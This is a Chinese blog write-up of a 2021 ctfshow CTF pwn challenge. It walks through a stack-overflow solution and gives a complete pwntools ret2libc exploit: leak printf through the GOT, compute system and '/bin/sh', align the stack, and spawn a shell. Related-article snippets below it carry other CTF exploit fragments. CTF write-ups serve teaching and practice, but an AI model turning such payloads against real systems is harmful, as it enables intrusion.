2021 ctfshow 月饼杯 pwn 简单的胖

最新推荐文章于 2023-05-07 22:34:04 发布
最新推荐文章于 2023-05-07 22:34:04 发布
阅读量258 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/120399666
版权

在这里插入图片描述
在这里插入图片描述
显然就是一个简单的栈溢出,但是问题是还是不知道libc。
试了半天libc是2.27的,但是2.27的ibc又会有一个栈对齐的问题。

调试调试给它对齐就行。
有好几处需要栈对齐。

exp

from pwn import*

context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']


r = process("yb1")

elf = ELF("./yb1")
libc = ELF("./64/libc-2.27.so")

pop_rdi = 0x400703
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main_addr = 0x4005f7
ret_addr = 0x400690


payload = "a" * 40 + p64(ret_addr) + p64(pop_rdi) + p64(printf_got) + p64(printf_plt) + p64(ret_addr) + p64(main_addr)

r.sendlineafter("What's your name? ",payload)

libc_base = u64(r.recvuntil("\x7f")[-6:] + '\x00\x00') - libc.sym['printf']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search("/bin/sh").next()

payload = 'a' * 40 + p64(ret_addr) + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
r.sendlineafter("What's your name? ",payload)

r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CTFSHOW]第二届月饼
Stan冲冲冲
09-24 421
MISC 杂项签到 下载后是张月饼,查看hex Y3Rmc2hvd3t3ZTFjb21lX3RvX21vb25jYWtlX2NhcH0= 明显的base64,解码后获得flag project Tao-1 打开的界面全选会发现隐藏文字13799489.log 进入这个地址后获得碎片提示 TG9nIGNhbiBnaXZlIHlvdSBtYW55IHNlY3JldHM= base64解码后 Log can give you many secrets 重新回到首页,按提示进入/Letsstart 全选发
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
ctfshow 月饼杯(第二届) 部分WriteUp
mumuzi的博客
09-21 2726
Misc 杂项签到 右键附件,从链接另存文件。然后用16进制编辑器或者你想用notepad也彳亍看文件尾,有一串base64,解码即可。 ctfshow{we1come_to_mooncake_cap} 有手就行 查看exif,有一串阿拉伯语,翻译过来是“你知道汉明码吗” 查看图片文件尾,发现一串数字 10110110111 然后随便找一篇看一下是怎么编码的,以及如何纠错的 https://blog.csdn.net/qq_19782019/article/details/87452394 例子他举的也
2021 ctfshow 月饼pwn Moon_note
yongbaoii的博客
09-24 265
保护全开,没给libc。 没给libc真可谓。 菜单 create 设计的很有意思,申请的chunk实现了类似unsorted bin 的一个hash表。 chunk的结构是前16个字节是title,中间16个字节是链表,后八个字节是一会write的时候写内容的chunk地址。 write 就是申请一个chunk,写东西,地址放到上面create里面说的那个玩意里面。 但是只能写一次。 show 正常show delete free掉chunk,但是漏洞就在free掉那个wirte的chunk之后没有清.
月饼杯II
记录学习,一起进步
05-07 596
月饼杯2021web方向wp
ctfshow web 月饼
m0_62422842的博客
06-10 499
刷题知识总结:php反序列化字符逃逸。php浮点数绕过。hash爆破。file_get_contents读取任意文件。like盲注,脚本编写。通过环境变量截取字符。
2021年“绿城杯”网络安全大赛
09-30
2021年“绿城杯”网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
赣网杯2021_pwn2.rar
12-11
赣网杯2021 pwn1 bin ctf
2021莲城杯比赛题包.zip
10-12
【2021莲城杯比赛题包.zip】是一个压缩包文件,包含了参与2021年莲城杯网络安全竞赛的相关题目和资料。这个比赛很可能是一个网络安全技术挑战赛,涉及了CTF(Capture The Flag)的形式,这是一种常见的网络安全竞赛...
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
Pwn】什么是堆栈内存对齐
weixin_52553215的博客
03-05 1056
AND ESP 0XFFFFFFF0 主流编译器的编译规则规定 “ 程序访问的地址必须向16字节对齐(被16整除)” ,内存对齐之后可以提高访问效率。 对齐前:三次 对齐后:两次
PWN-PRACTICE-CTFSHOW-8
P1umH0的博客
01-18 1844
PWN-PRACTICE-CTFSHOW-8吃瓜杯-wuqian月饼杯II-简单月饼杯II-容易的击剑杯-pwn01-My_sword_is_ready 吃瓜杯-wuqian 栈溢出,ret2text # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28059) elf=ELF("./pwn1") sy
2021 ctfshow 月饼pwn 容易的
yongbaoii的博客
09-24 210
保护啥也没有。 看起来似乎是就是一个输入shellcode的过程,但是往哪输入,然后输入进去咋样,题目怎么做,都暂时看不出来,所以需要我们去调试一下。 可以看出来shellcode被放在了0x804a040,这是一个bss上的地址。 我们可以看到,当我们通过’\x00’截断来绕过strcmp正常返回的时候,我们会把ebp-8,也就是v3地方的地址弹到ecx,然后控制了它就可以控制我们函数的返回地址,我们只要让它合适的返回到我们的shellcode上就好啦。 exp from pwn import* .
ctfshow_2021月饼杯记录
MiGooli的博客
09-21 1693
一、WEB篇 作为队内的web手,差点连签到题都做不出来,属实是拉大胯丢大人了 web签到 <?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $fla
[ctf.show.reverse] 月饼杯II 逆向辣鸡工程师的工作
weixin_52640415的博客
04-28 316
从文件中追踪流得到elf文件,RC4加密,得到一个fake __int64 __fastcall sub_1360(__int64 a1, _BYTE *a2, __int64 a3) { _BYTE *v3; // r10 unsigned int v4; // er9 unsigned int v5; // er8 char *v6; // rax char v7; // dl char *v8; // rcx __int64 result; // rax if (
buuctf DSACTF7月pwn 栈迁移 ret对齐 修改bss的内容 lea esp, [ecx-4] 64位格式化字符串修改got
carol2358的博客
07-27 1587
文章目录actf_2019_babystack actf_2019_babystack 栈迁移,注意ret对齐 没对齐的: 对齐的: exp: from pwn import * from LibcSearcher import * local_file = './ACTF_2019_babystack' local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' remote_libc = '/root/glibc-all-in-o
ctfshow 月饼杯 crypto2_月自圆
m0_62506844的博客
01-16 2574
def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2) return c if __name__ == "__main__": m = '****************************************************flag{*************}' assert(len(m)==71) .
CTF总结-PWN
qq_42747131的博客
05-14 6894
一、通用过程 通过file指令查看二进制文件是32位还是64位,这个影响特别大(涉及参数的传递方式) 通过checksec指令查看可执行文件的保护措施开启情况 运行一下这个可执行文件,了解一些程序运行流程 开始通过pwntools解题 pwntools 二、缓冲区溢出攻击 寻找可以进行攻击的位置 通过cyclic [number] 获得一个长度为number的序列 在攻击处输入上一步获得的序列,查看报错信息 通过cyclic -l [序列] 来判断从第几位开始覆盖的是返回地址 构造payload 构造
ctfshowpwn2
最新发布
09-28
ctfshowpwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag文件。 2. 使用cat命令打开flag文件,成功拿到flag。 3. 接下来,构造exp,引用中给出了一个使用pwntools库构造的exp示例。其中,使用remote函数连接到pwn.challenge.ctf.show的28025端口。 4. 设置bk变量的值为0x804850f。 5. 构造payload,其中包含了"a"*(0x9 0x4)和p32(bk)。 6. 使用sendline函数发送payload。 7. 使用interactive函数与远程主机进行交互。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值